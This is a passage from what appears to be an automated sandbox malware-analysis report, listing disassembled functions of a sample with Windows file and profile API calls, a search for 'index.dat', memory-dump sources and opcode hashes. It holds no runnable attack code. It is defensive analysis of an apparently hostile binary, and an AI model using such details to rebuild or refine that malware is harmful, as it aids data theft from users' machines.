                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1979745280-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                                                                                                              Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                                                              • String ID: *.*$index.dat
                                                                                                                                                                                                                                                                                                                              • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                                                                                                              Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                                                                                                              Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3397143404-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                                                                                                              Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                                                                                                              Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                                                                                                                                                                              Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1381354015-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                                                                                                              Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1297977491-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                                                                                                              Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                                                                                                              Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$PointerRead
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                                                                                                              Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4232544981-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                                                                                                              Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                                                                                                              Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                                                                                                              Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
